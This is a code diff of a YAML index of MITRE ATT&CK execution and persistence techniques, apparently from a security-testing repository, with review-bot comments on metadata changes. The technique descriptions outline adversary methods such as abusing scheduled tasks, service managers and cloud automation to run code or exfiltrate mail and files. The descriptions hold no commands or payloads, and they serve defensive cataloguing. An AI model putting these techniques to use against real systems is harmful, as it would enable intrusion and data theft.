+ description: 'Marschalek, Marion. (2014, December 16). EvilBunny: Malware
+ Instrumented By Lua. Retrieved August 5, 2024.'
+ url: https://web.archive.org/web/20150311013500/http:/www.cyphort.com/evilbunny-malware-instrumented-lua/
+ - source_name: PoetRat Lua
+ description: 'Mercer, Warren. (2020, October 6). PoetRAT: Malware targeting
+ public and private sector in Azerbaijan evolves. Retrieved August 5, 2024.'
+ url: https://blog.talosintelligence.com/poetrat-update/
+ - source_name: Lua Proofpoint Sunseed
+ description: 'Raggi, Michael. Cass, Zydeca. The Proofpoint Threat Research
+ Team.. (2022, March 1). Asylum Ambuscade: State Actor Uses Lua-based Sunseed
+ Malware to Target European Governments and Refugee Movement. Retrieved August
+ 5, 2024.'
+ url: https://www.proofpoint.com/us/blog/threat-insight/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1204.003:
technique:
x_mitre_platforms:
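Review bot: the new T1059.011 block has no `identifier:` line before `atomic_tests: []`, whereas the T1559 object directly above it ends with `identifier: T1559` followed by `atomic_tests: []`. Other objects in this patch (T1559.003, T1204, T1203) also lack the key, so the generator emits it inconsistently; either emit `identifier` for every technique or drop it everywhere so consumers can rely on one shape. In the same hunk T1559 loses `x_mitre_permissions_required` (`Administrator`, `User`, `SYSTEM`) with no replacement and moves 1.2 to 1.3; as with T1569.001, note the dropped field in the commit message.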
@@ -26547,7 +26926,7 @@ execution:
url: https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation
description: Team Nautilus. (2021, June). Attacks in the Wild on the Container
Supply Chain and Infrastructure. Retrieved August 26, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-26T16:42:35.318Z'
name: 'User Execution: Malicious Image'
description: |-
Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://attack.mitre.org/techniques/T1608/001), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.(Citation: Summit Route Malicious AMIs)
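Review bot: T1204.003's `modified` timestamp regresses from `2022-04-25T14:00:00.188Z` to `2021-08-26T16:42:35.318Z`, earlier than the value it replaces and on the same day as the `Retrieved August 26, 2021` date of the Team Nautilus reference just above it. Everything else in this patch moves to 2024 dates, so this object appears to come from an older snapshot; verify the source before merging.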
@@ -26574,30 +26953,12 @@ execution:
- 'Instance: Instance Creation'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1204.003
atomic_tests: []
T1203:
technique:
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
- created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '1.4'
- external_references:
- - source_name: mitre-attack
- external_id: T1203
- url: https://attack.mitre.org/techniques/T1203
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-15T16:34:23.908Z'
+ name: Exploitation for Client Execution
description: |-
Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
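Review bot: T1204.003 loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` and, unlike every other technique in this patch, gets no `x_mitre_attack_spec_version: 3.2.0` added back anywhere in its hunks, leaving it as the only object with no spec marker at all while it keeps the older `x_mitre_permissions_required` field. Together with the backwards `modified` change in the preceding hunk this reads as a stale copy; re-export this technique from the same source as the others so the file is uniform.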
@@ -26614,9 +26975,10 @@ execution:
### Common Third-party Applications
Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Exploitation for Client Execution
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: Detecting software exploitation may be difficult depending
on the tools available. Also look for behavior on the endpoint system that
might indicate successful compromise, such as abnormal behavior of the browser
@@ -26624,21 +26986,37 @@ execution:
evidence of [Process Injection](https://attack.mitre.org/techniques/T1055)
for attempts to hide execution, evidence of Discovery, or other unusual network
traffic that may indicate additional tools transferred to the system.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: execution
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
+ - 'File: File Modification'
- 'Application Log: Application Log Content'
+ - 'Network Traffic: Network Traffic Flow'
+ x_mitre_remote_support: false
x_mitre_system_requirements:
- Remote exploitation for execution requires a remotely accessible service reachable
over the network or other vector of access such as spearphishing or drive-by
compromise.
- x_mitre_remote_support: false
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--be2dcee9-a7a7-4e38-afd6-21b31ecc3d63
+ created: '2018-04-18T17:59:24.739Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1203
+ external_id: T1203
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.006:
technique:
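Review bot: `spec_version: '2.1'` is dropped while `x_mitre_attack_spec_version` moves from 2.1.0 to 3.2.0, and the same drop is repeated for every entry in this patch; if the generator has intentionally stopped emitting the STIX `spec_version` key, a sentence in the PR description would save downstream consumers of this YAML from guessing. Two data sources (`File: File Modification`, `Network Traffic: Network Traffic Flow`) and `x_mitre_version: '1.4'` also appear here with no `-` line for a previous value, which is consistent with a field move but deserves a check that 1.4 is the upstream version.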
@@ -26688,28 +27066,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.006
atomic_tests: []
T1569:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
- type: attack-pattern
- created: '2020-03-10T18:23:06.482Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1569
- url: https://attack.mitre.org/techniques/T1569
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-09-20T19:55:40.527Z'
name: System Services
description: Adversaries may abuse system services or daemons to execute commands
or programs. Adversaries can execute malicious content by interacting with
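Review bot: this hunk only deletes fields that the next hunk re-inserts lower in the T1569 object (platforms, domains, object_marking_refs, id, type, created, created_by_ref, external_references); the single content change is `modified` 2022-05-11 → 2024-09-20. A stable key order in the generator would shrink diffs like this to the one changed line and make real changes far easier to review.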
@@ -26720,32 +27081,44 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: Monitor for command line invocations of tools capable of
modifying services that doesn’t correspond to normal usage patterns and known
software, patch cycles, etc. Also monitor for changes to executables and other
files associated with services. Changes to Windows services may also be reflected
in the Registry.
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'Process: Process Creation'
- 'Service: Service Creation'
- 'File: File Modification'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- - root
x_mitre_remote_support: true
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253
+ created: '2020-03-10T18:23:06.482Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1569
+ external_id: T1569
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1059.003:
technique:
- modified: '2024-03-01T17:35:02.889Z'
+ modified: '2024-10-15T15:19:56.540Z'
name: 'Command and Scripting Interpreter: Windows Command Shell'
description: |-
Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)
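Review bot: `x_mitre_permissions_required` (User/Administrator/SYSTEM/root) is removed from T1569 and not re-added anywhere in the hunk, which is a content change rather than the key reordering the rest of the hunk consists of; the same deletion recurs for T1204.001 and T1556.003 further down. If this tracks upstream ATT&CK dropping the field under spec 3.2.0, please say so in the PR description so reviewers can separate reorders from real deletions; the newly introduced `x_mitre_deprecated: false` and `revoked: false` keys fall in the same category.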
@@ -26788,12 +27161,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.003
atomic_tests: []
T1651:
technique:
- modified: '2024-04-12T03:27:48.171Z'
+ modified: '2024-10-15T13:42:42.543Z'
name: Cloud Administration Command
description: |-
Adversaries may abuse cloud management services to execute commands within virtual machines. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. (Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command)
@@ -26850,11 +27222,10 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:43:27.104Z'
name: 'Command and Scripting Interpreter: Visual Basic'
description: |-
Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)
@@ -26919,14 +27290,13 @@ execution:
url: https://en.wikipedia.org/wiki/Visual_Basic_for_Applications
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.005
atomic_tests: []
T1648:
technique:
- modified: '2024-03-05T16:13:38.643Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Serverless Execution
description: "Adversaries may abuse serverless computing, integration, and automation
services to execute arbitrary code in cloud environments. Many cloud providers
@@ -26947,14 +27317,19 @@ execution:
an adversary may create a Lambda function that automatically adds [Additional
Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to a user
and a corresponding CloudWatch events rule that invokes that function whenever
- a new user is created.(Citation: Backdooring an AWS account) Similarly, an
- adversary may create a Power Automate workflow in Office 365 environments
- that forwards all emails a user receives or creates anonymous sharing links
- whenever a user is granted access to a document in SharePoint.(Citation: Varonis
- Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001)"
+ a new user is created.(Citation: Backdooring an AWS account) This is also
+ possible in many cloud-based office application suites. For example, in Microsoft
+ 365 environments, an adversary may create a Power Automate workflow that forwards
+ all emails a user receives or creates anonymous sharing links whenever a user
+ is granted access to a document in SharePoint.(Citation: Varonis Power Automate
+ Data Exfiltration)(Citation: Microsoft DART Case Report 001) In Google Workspace
+ environments, they may instead create an Apps Script that exfiltrates a user's
+ data when they open a file.(Citation: Cloud Hack Tricks GWS Apps Script)(Citation:
+ OWN-CERT Google App Script 2024)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Shailesh Tiwary (Indian Army)
- Praetorian
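Review bot: the new description sentences cite `(Citation: Cloud Hack Tricks GWS Apps Script)` and `(Citation: OWN-CERT Google App Script 2024)`, and both `source_name` entries are added in the external_references hunk below with keys that match character for character, so nothing is dangling. One oddity: `x_mitre_attack_spec_version: 3.2.0` is inserted directly after `kill_chain_phases` here, whereas every other regenerated entry in this patch places it after `object_marking_refs`; harmless for YAML, but it suggests the generator's key order is not deterministic for T1648.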
@@ -26963,16 +27338,18 @@ execution:
- Varonis Threat Labs
- Alex Soler, AttackIQ
- Vectra AI
+ - OWN
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- SaaS
- IaaS
- - Office 365
- x_mitre_version: '1.0'
+ - Office Suite
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Cloud Service: Cloud Service Modification'
- 'Application Log: Application Log Content'
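Review bot: the platform rename `Office 365` → `Office Suite` (with `x_mitre_version` 1.0 → 1.1) is a semantic change, not a reorder: any platform-keyed index built from this file will lose T1648 unless the indexer recognises the new platform name, so the index CSVs should be regenerated in the same PR and the mapping checked. The added `OWN` contributor and `x_mitre_modified_by_ref` placement are consistent with the other entries.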
@@ -26998,6 +27375,14 @@ execution:
description: Eric Saraga. (2022, February 2). Using Power Automate for Covert
Data Exfiltration in Microsoft 365. Retrieved May 27, 2022.
url: https://www.varonis.com/blog/power-automate-data-exfiltration
+ - source_name: Cloud Hack Tricks GWS Apps Script
+ description: HackTricks Cloud. (n.d.). GWS - App Scripts. Retrieved July 1,
+ 2024.
+ url: https://cloud.hacktricks.xyz/pentesting-cloud/workspace-security/gws-google-platforms-phishing/gws-app-scripts
+ - source_name: OWN-CERT Google App Script 2024
+ description: L'Hutereau Arnaud. (n.d.). Google Workspace Malicious App Script
+ analysis. Retrieved October 2, 2024.
+ url: https://www.own.security/ressources/blog/google-workspace-malicious-app-script-analysis
- source_name: Cado Security Denonia
description: 'Matt Muir. (2022, April 6). Cado Discovers Denonia: The First
Malware Specifically Targeting Lambda. Retrieved May 27, 2022.'
@@ -27012,29 +27397,10 @@ execution:
url: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1204.001:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
- type: attack-pattern
- created: '2020-03-11T14:43:31.706Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1204.001
- url: https://attack.mitre.org/techniques/T1204/001
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-09-10T16:40:03.786Z'
name: Malicious Link
description: An adversary may rely upon a user clicking a malicious link in
order to gain execution. Users may be subjected to social engineering to get
@@ -27047,25 +27413,41 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: |-
Inspect network traffic for indications that a user visited a malicious site, such as links included in phishing campaigns directed at your organization.
Anti-virus can potentially detect malicious documents and files that are downloaded from a link and executed on the user's computer.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Creation'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9
+ created: '2020-03-11T14:43:31.706Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1204/001
+ external_id: T1204.001
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1569.002:
technique:
- modified: '2023-08-14T15:53:00.999Z'
+ modified: '2024-10-15T16:41:40.247Z'
name: 'System Services: Service Execution'
description: |-
Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (services.exe
) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as sc.exe
and [Net](https://attack.mitre.org/software/S0039).
@@ -27115,17 +27497,16 @@ execution:
url: https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1569.002
atomic_tests: []
T1053.002:
technique:
- modified: '2023-11-15T14:38:10.876Z'
+ modified: '2024-10-12T15:53:12.333Z'
name: 'Scheduled Task/Job: At'
description: |-
- Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+ Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow
file. If the at.allow
file does not exist, the at.deny
file is checked. Every username not listed in at.deny
is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny
exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
@@ -27188,7 +27569,7 @@ execution:
- Windows
- Linux
- macOS
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Scheduled Job: Scheduled Job Creation'
@@ -27222,8 +27603,8 @@ execution:
url: https://man7.org/linux/man-pages/man1/at.1p.html
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Microsoft Scheduled Task Events Win10
description: Microsoft. (2017, May 28). Audit Other Object Access Events.
Retrieved June 27, 2019.
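Review bot: the `twitter.com` → `x.com` rewrite and the new retrieved date (September 12, 2024) for `Twitter Leoloobeek Scheduled Task` are repeated verbatim for the same source under T1053.005 below; the publication date stays at 2017 while only the retrieval date moves, which is the upstream convention and should not be "corrected" locally.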
@@ -27232,6 +27613,10 @@ execution:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Malicious Life by Cybereason
+ description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+ the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+ url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
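Review bot: the `Malicious Life by Cybereason` source resolves the `(Citation: Malicious Life by Cybereason)` added to the T1053.002 description above, so the reference is consistent. Its URL carries a `#blog-subscribe` fragment that points at the page's subscribe widget rather than the article body; this comes from upstream ATT&CK data, but it is worth reporting upstream so the link lands on the content.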
@@ -27244,29 +27629,29 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.002
atomic_tests: []
persistence:
T1053.005:
technique:
- modified: '2023-11-15T14:33:53.354Z'
+ modified: '2024-10-13T16:13:47.770Z'
name: 'Scheduled Task/Job: Scheduled Task'
description: "Adversaries may abuse the Windows Task Scheduler to perform task
scheduling for initial or recurring execution of malicious code. There are
multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
utility can be run directly on the command line, or the Task Scheduler can
be opened through the GUI within the Administrator Tools section of the Control
- Panel. In some cases, adversaries have used a .NET wrapper for the Windows
- Task Scheduler, and alternatively, adversaries have used the Windows netapi32
- library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
- utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
- though at.exe
can not access tasks created with schtasks
- or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
- programs at system startup or on a scheduled basis for persistence. The Windows
- Task Scheduler can also be abused to conduct remote Execution as part of Lateral
- Movement and/or to run a process under the context of a specified account
- (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+ Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+ wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+ used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+ (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+ Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+ create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+ Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+ system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+ can also be abused to conduct remote Execution as part of Lateral Movement
+ and/or to run a process under the context of a specified account (such as
+ SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
adversaries have also abused the Windows Task Scheduler to potentially mask
one-time execution under signed/trusted system processes.(Citation: ProofPoint
Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
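Review bot: besides the new WMI / `Invoke-CimMethod` sentence, this rewrite drops the paragraph about the deprecated `at` utility (`The deprecated [at](...) utility could also be abused ... at.exe can not access tasks created with schtasks or the Control Panel`), which was the only cross-link from T1053.005 to T1053.002. The unchanged context line `can not access tasks created with schtasks` sitting between two removed lines suggests a fragment of the old paragraph survives, so please check that the regenerated description reads cleanly at that point and matches the upstream ATT&CK text rather than a partial merge.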
@@ -27313,7 +27698,7 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
@@ -27345,8 +27730,8 @@ persistence:
url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Tarrask scheduled task
description: Microsoft Threat Intelligence Team & Detection and Response Team
. (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -27360,6 +27745,10 @@ persistence:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Red Canary - Atomic Red Team
+ description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+ Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+ url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
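Review bot: the new `Red Canary - Atomic Red Team` source points at `atomics/T1053.005/T1053.005.md` in this very repository, so the index now cites the repo that generates it; harmless, but the `blob/master` link goes stale if the default branch is renamed, and a commit-pinned URL would be more robust for upstream to carry.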
@@ -27372,16 +27761,19 @@ persistence:
description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
Task - Registry. Retrieved June 1, 2022.
url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+ - source_name: Stack Overflow
+ description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+ Tasks folder. Retrieved June 19, 2024.
+ url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.005
atomic_tests: []
T1205.002:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-20T19:56:18.579Z'
name: Socket Filters
description: |-
Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
